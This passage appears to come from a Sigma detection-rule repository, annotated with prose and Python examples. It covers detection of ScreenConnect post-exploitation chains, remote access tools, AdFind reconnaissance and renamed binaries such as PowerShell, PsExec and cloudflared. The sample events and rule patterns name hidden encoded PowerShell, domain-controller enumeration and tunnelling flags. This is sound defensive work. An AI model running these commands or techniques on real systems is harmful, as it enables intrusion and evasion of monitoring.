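SVC = "C:\\Program Files (x86)\\ScreenConnect Client (abc123)\\ScreenConnect.ClientService.exe"

# Constructed event chain: hop 1, two hop-2 children, then two benign look-alikes.
SAMPLE_CHAIN = [
    {"ParentImage": SVC, "Image": "C:\\Windows\\System32\\cmd.exe",
     "OriginalFileName": "Cmd.Exe", "CommandLine": STAGED_CMD},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": STAGED_CMD,
     "Image": "C:\\Windows\\System32\\nltest.exe", "CommandLine": "nltest /dclist:"},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": STAGED_CMD,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc AAAA"},
    # interactive console from the service, not a staged script: rule 1 needs \TEMP\ScreenConnect\
    {"ParentImage": SVC, "Image": "C:\\Windows\\System32\\cmd.exe",
     "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd.exe"},
    # child of the staged script that is not on the suspicious list
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": STAGED_CMD,
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for row in triage_chain(SAMPLE_CHAIN):
        print(row)
```

Hop 1 fires the low-severity rule on its own; the medium-severity rule only sees hop 2 and identifies it through ParentCommandLine, so both rules must be enabled to reconstruct the chain from process-creation telemetry alone.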
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml",
    "content": "title: Remote Access Tool - ScreenConnect Server Web Shell Execution\nid: b19146a3-25d4-41b4-928b-1e2a92641b1b\nstatus: test\ndescription: Detects potential web shell execution from the ScreenConnect server process.\nreferences:\n    - https://blackpointcyber.com/resources/blog/breaking-through-the-screen/\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\nauthor: Jason Rathbun (Blackpoint Cyber)\ndate: 2024-02-26\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\ScreenConnect.Service.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml",
    "content": "title: Remote Access Tool - Simple Help Execution\nid: 95e60a2b-4705-444b-b7da-ba0ea81a3ee2\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\JWrapper-Remote Access\\'\n            - '\\JWrapper-Remote Support\\'\n        Image|endswith: '\\SimpleService.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml",
    "content": "title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server\nid: 2db93a3f-3249-4f73-9e68-0e77a0f8ae7e\nstatus: experimental\ndescription: |\n    Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.\n    These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.\n    This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.\nreferences:\n    - https://github.com/amidaware/tacticalrmm\n    - https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3\nauthor: Ahmed Nosir (@egycondor)\ndate: 2025-05-29\ntags:\n    - attack.command-and-control\n    - attack.t1219\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\TacticalAgent\\tacticalrmm.exe'\n        CommandLine|contains|all:\n            - '--api'\n            - '--auth'\n            - '--client-id'\n            - '--site-id'\n            - '--agent-type'\n    condition: selection\nfalsepositives:\n    - Legitimate system administrator deploying TacticalRMM\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On Windows Host\nid: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\nrelated:\n    - id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\n      type: similar\n    - id: f459ccb4-9805-41ea-b5b2-55e279e2424a\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session initiated by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image: 'TeamViewer_Desktop.exe'\n        ParentImage: 'TeamViewer_Service.exe'\n        CommandLine|endswith: 'TeamViewer_Desktop.exe --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml",
    "content": "title: Remote Access Tool - UltraViewer Execution\nid: 88656cec-6c3b-487c-82c0-f73ebb805503\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-09-25\nmodified: 2024-03-14\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product: 'UltraViewer'\n        - Company: 'DucFabulous Co,ltd'\n        - OriginalFileName: 'UltraViewer_Desktop.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml",
    "content": "title: Discovery of a System Time\nid: b243b280-65fe-48df-ba07-6ddea7646427\nstatus: test\ndescription: Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2022-06-28\ntags:\n    - attack.discovery\n    - attack.t1124\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_time:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'time'\n    selection_w32tm:\n        Image|endswith: '\\w32tm.exe'\n        CommandLine|contains: 'tz'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of these system utilities to query the system time for a legitimate reason\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_adfind.yml",
    "content": "title: Renamed AdFind Execution\nid: df55196f-f105-44d3-a675-e9dfb6cc2f2b\nstatus: test\ndescription: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://thedfirreport.com/2020/05/08/adfind-recon/\n    - https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2025-02-26\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'domainlist'\n            - 'trustdmp'\n            - 'dcmodes'\n            - 'adinfo'\n            - ' dclist '\n            - 'computer_pwdnotreqd'\n            - 'objectcategory='\n            - '-subnets -f'\n            - 'name=\"Domain Admins\"'\n            - '-sc u:'\n            - 'domainncs'\n            - 'dompol'\n            - ' oudmp '\n            - 'subnetdmp'\n            - 'gpodmp'\n            - 'fspdmp'\n            - 'users_noexpire'\n            - 'computers_active'\n            - 'computers_pwdnotreqd'\n    selection_2:\n        Hashes|contains:\n            - 'IMPHASH=BCA5675746D13A1F246E2DA3C2217492'\n            - 'IMPHASH=53E117A96057EAF19C41380D0E87F1C2'\n            - 'IMPHASH=d144de8117df2beceaba2201ad304764'\n            - 'IMPHASH=12ce1c0f3f5837ecc18a3782408fa975'\n            - 'IMPHASH=4fbf3f084fbbb2470b80b2013134df35'\n            - 'IMPHASH=49b639b4acbecc49d72a01f357aa4930'\n            - 'IMPHASH=680dad9e300346e05a85023965867201'\n            - 'IMPHASH=21aa085d54992511b9f115355e468782'\n    selection_3:\n        OriginalFileName: 'AdFind.exe'\n    filter:\n        Image|endswith: '\\AdFind.exe'\n    condition: 1 of selection* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml",
    "content": "title: Renamed AutoHotkey.EXE Execution\nid: 0f16d9cf-0616-45c8-8fad-becc11b5a41c\nstatus: test\ndescription: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields\nreferences:\n    - https://www.autohotkey.com/download/\n    - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\nauthor: Nasreddine Bencherchali\ndate: 2023-02-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'AutoHotkey'\n        - Description|contains: 'AutoHotkey'\n        - OriginalFileName:\n              - 'AutoHotkey.exe'\n              - 'AutoHotkey.rc'\n    filter:\n        - Image|endswith:\n              - '\\AutoHotkey.exe'\n              - '\\AutoHotkey32.exe'\n              - '\\AutoHotkey32_UIA.exe'\n              - '\\AutoHotkey64.exe'\n              - '\\AutoHotkey64_UIA.exe'\n              - '\\AutoHotkeyA32.exe'\n              - '\\AutoHotkeyA32_UIA.exe'\n              - '\\AutoHotkeyU32.exe'\n              - '\\AutoHotkeyU32_UIA.exe'\n              - '\\AutoHotkeyU64.exe'\n              - '\\AutoHotkeyU64_UIA.exe'\n        - Image|contains: '\\AutoHotkey'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_autoit.yml",
    "content": "title: Renamed AutoIt Execution\nid: f4264e47-f522-4c38-a420-04525d5b880f\nstatus: test\ndescription: |\n    Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\n    AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\n    Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.\nreferences:\n    - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w\n    - https://www.autoitscript.com/site/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-04\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - ' /AutoIt3ExecuteScript'\n            - ' /ErrorStdOut'\n    selection_2:\n        Hashes|contains:\n            - 'IMPHASH=FDC554B3A8683918D731685855683DDF'  # AutoIt v2 - doesn't cover all binaries\n            - 'IMPHASH=CD30A61B60B3D60CECDB034C8C83C290'  # AutoIt v2 - doesn't cover all binaries\n            - 'IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000'  # AutoIt v3 - doesn't cover all binaries\n    selection_3:\n        OriginalFileName:\n            - 'AutoIt3.exe'\n            - 'AutoIt2.exe'\n            - 'AutoIt.exe'\n    filter_main_legit_name:\n        Image|endswith:\n            - '\\AutoIt.exe'\n            - '\\AutoIt2.exe'\n            - '\\AutoIt3_x64.exe'\n            - '\\AutoIt3.exe'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_binary.yml",
    "content": "title: Potential Defense Evasion Via Binary Rename\nid: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: similar\nstatus: test\ndescription: Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName field.\nreferences:\n    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\n    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process\n    - https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nauthor: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)\ndate: 2019-06-15\nmodified: 2025-07-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'CONHOST.EXE'\n            - '7z.exe'\n            - '7za.exe'\n            - 'WinRAR.exe'\n            - 'wevtutil.exe'\n            - 'net.exe'\n            - 'net1.exe'\n            - 'netsh.exe'\n            - 'InstallUtil.exe'\n    filter:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\conhost.exe'\n            - '\\7z.exe'\n            - '\\7za.exe'\n            - '\\WinRAR.exe'\n            - '\\wevtutil.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netsh.exe'\n            - '\\InstallUtil.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Custom applications that ship these binaries under a slightly changed name. Typically this is easy to spot and allowlist\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml",
    "content": "title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries\nid: 0ba1da6d-b6ce-4366-828c-18826c9de23e\nrelated:\n    - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\n      type: similar\n    - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed Rundll32 Specific\n      type: derived\n    - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 # Renamed PsExec\n      type: obsolete\n    - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 # Renamed PowerShell\n      type: obsolete\n    - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 # Renamed Rundll32\n      type: obsolete\nstatus: test\ndescription: Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName field.\nreferences:\n    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\n    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\n    - https://twitter.com/christophetd/status/1164506034720952320\n    - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\n    - https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke\nauthor: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113\ndate: 2019-06-15\nmodified: 2026-02-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Execute processes remotely'\n        - Product: 'Sysinternals PsExec'\n        - Description|startswith:\n              - 'Windows PowerShell'\n              - 'pwsh'\n        - OriginalFileName:\n              - 'certutil.exe'\n              - 'cmstp.exe'\n              - 'cscript.exe'\n              - 'IE4UINIT.EXE'\n              - 'finger.exe'\n              - 'mshta.exe'\n              - 'msiexec.exe'\n              - 'msxsl.exe'\n              - 'powershell_ise.exe'\n              - 'powershell.exe'\n              - 'psexec.c'        # old versions of psexec (2016 seen)\n              - 'psexec.exe'\n              - 'psexesvc.exe'\n              - 'pwsh.dll'\n              - 'reg.exe'\n              - 'regsvr32.exe'\n              - 'rundll32.exe'\n              - 'WerMgr'\n              - 'wmic.exe'\n              - 'wscript.exe'\n    filter:\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\cmstp.exe'\n            - '\\cscript.exe'\n            - '\\ie4uinit.exe'\n            - '\\finger.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\msxsl.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\psexec.exe'\n            - '\\psexec64.exe'\n            - '\\PSEXESVC.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wermgr.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Custom applications that ship these binaries under a slightly changed name. Typically this is easy to spot and allowlist\n    - PsExec installed via the Windows Store doesn't carry the OriginalFileName field (false negative)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml\n"
  },
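Rules 36480ae1 and 0ba1da6d above both rest on one observation: a file rename changes the on-disk name (Image) but not the PE version-info fields Sysmon copies into the event (OriginalFileName, Description, Product), so a mismatch between the two is the signal. The rules keep explicit lists on both sides rather than comparing OriginalFileName to the image basename directly, because the two names legitimately differ for some binaries (psexec.c, pwsh.dll, WerMgr). The following is an added example, not code from the SigmaHQ repository, that transcribes the lists from 0ba1da6d and runs the check over constructed Sysmon-style events with hypothetical paths; it also shows the false negative the rule's own note describes, where no version info is present at all.

```python
"""
Renamed-binary check: PE version-info fields that survive a rename, minus the
images that carry their expected on-disk name. Lists transcribed from 0ba1da6d.
"""
import ntpath

# OriginalFileName values the rule hunts for (lower-cased; Sigma matches case-insensitively).
ORIGINAL_FILENAMES = {
    "certutil.exe", "cmstp.exe", "cscript.exe", "ie4uinit.exe", "finger.exe", "mshta.exe",
    "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c",
    "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe",
    "wermgr", "wmic.exe", "wscript.exe",
}
# On-disk names the rule's filter accepts; note psexec64.exe, pwsh.exe and wermgr.exe
# differ from the OriginalFileName strings above, which is why a direct comparison fails.
EXPECTED_IMAGE_NAMES = {
    "certutil.exe", "cmstp.exe", "cscript.exe", "ie4uinit.exe", "finger.exe", "mshta.exe",
    "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.exe",
    "psexec64.exe", "psexesvc.exe", "pwsh.exe", "reg.exe", "regsvr32.exe", "rundll32.exe",
    "wermgr.exe", "wmic.exe", "wscript.exe",
}


def _lc(event, field):
    return (event.get(field) or "").lower()


def in_selection(event) -> bool:
    """Any of the four selection branches of rule 0ba1da6d."""
    desc, prod = _lc(event, "Description"), _lc(event, "Product")
    return (
        desc == "execute processes remotely"
        or prod == "sysinternals psexec"
        or desc.startswith(("windows powershell", "pwsh"))
        or _lc(event, "OriginalFileName") in ORIGINAL_FILENAMES
    )


def is_renamed(event) -> bool:
    """selection and not filter: metadata says 'known tool', basename says otherwise."""
    return in_selection(event) and ntpath.basename(_lc(event, "Image")) not in EXPECTED_IMAGE_NAMES


# Constructed events (hypothetical paths; the version-info strings are the ones the rule lists).
SAMPLES = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "Description": "Windows PowerShell"},        # normal
    {"Image": "C:\\Users\\Public\\svchost.exe",
     "OriginalFileName": "PowerShell.EXE", "Description": "Windows PowerShell"},        # renamed
    {"Image": "C:\\Temp\\ps.exe", "OriginalFileName": "psexec.c",
     "Description": "Execute processes remotely", "Product": "Sysinternals PsExec"},   # old PsExec, renamed
    {"Image": "C:\\Tools\\PsExec64.exe", "OriginalFileName": "psexec.c",
     "Product": "Sysinternals PsExec"},                                                 # old PsExec, expected name
    {"Image": "C:\\Users\\Public\\svchost.exe"},                                        # no version info: false negative
    {"Image": "C:\\Windows\\System32\\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE"},  # normal
    {"Image": "C:\\Windows\\Temp\\r.exe", "OriginalFileName": "RUNDLL32.EXE"},         # renamed
]


def scan(events=SAMPLES):
    return [is_renamed(e) for e in events]


if __name__ == "__main__":
    for e, hit in zip(SAMPLES, scan()):
        print(hit, e["Image"])
```

The fifth sample is the gap the rule's falsepositives note points at: a build with no version resource never enters the selection, so a detection that needs the rename itself (not just the tool) has to come from elsewhere, for instance the import-hash branches used by the AdFind and AutoIt rules in this directory.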
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_boinc.yml",
    "content": "title: Renamed BOINC Client Execution\nid: 30d07da2-83ab-45d8-ae75-ec7c0edcaffc\nstatus: test\ndescription: Detects the execution of a renamed BOINC binary.\nreferences:\n    - https://boinc.berkeley.edu/\n    - https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'BOINC.exe'\n    filter_main_legit_name:\n        Image|endswith: '\\BOINC.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml",
    "content": "title: Renamed BrowserCore.EXE Execution\nid: 8a4519e8-e64a-40b6-ae85-ba8ad2177559\nstatus: test\ndescription: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)\nreferences:\n    - https://twitter.com/mariuszbit/status/1531631015139102720\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-02-03\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1528\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: BrowserCore.exe\n    filter_realbrowsercore:\n        Image|endswith: '\\BrowserCore.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml",
    "content": "title: Renamed Cloudflared.EXE Execution\nid: e0c69ebd-b54f-4aed-8ae3-e3467843f3f0\nstatus: test\ndescription: Detects the execution of a renamed \"cloudflared\" binary.\nreferences:\n    - https://github.com/cloudflare/cloudflared/releases\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cleanup:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - 'cleanup '\n        CommandLine|contains:\n            - '-config '\n            - '-connector-id '\n    selection_tunnel:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - ' run '\n        CommandLine|contains:\n            - '-config '\n            - '-credentials-contents '\n            - '-credentials-file '\n            - '-token '\n    selection_accountless:\n        CommandLine|contains|all:\n            - '-url'\n            - 'tunnel'\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29'\n            - 'SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8'\n            - 'SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039'\n            - 'SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28'\n            - 'SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7'\n            - 'SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373'\n            - 'SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670'\n            - 'SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a'\n            - 'SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0'\n            - 'SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1'\n            - 'SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2'\n            - 'SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac'\n            - 'SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f'\n            - 'SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d'\n            - 'SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499'\n            - 'SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b'\n            - 'SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f'\n            - 'SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032'\n            - 'SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234'\n            - 'SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f'\n            - 'SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058'\n            - 'SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c'\n            - 'SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f'\n            - 'SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5'\n            - 'SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3'\n            - 'SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4'\n            - 'SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c'\n            - 'SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4'\n            - 'SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f'\n            - 'SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad'\n            - 'SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7'\n            - 'SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75'\n            - 'SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6'\n            - 'SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688'\n            - 'SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f'\n            - 'SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663'\n            - 'SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77'\n            - 'SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078'\n    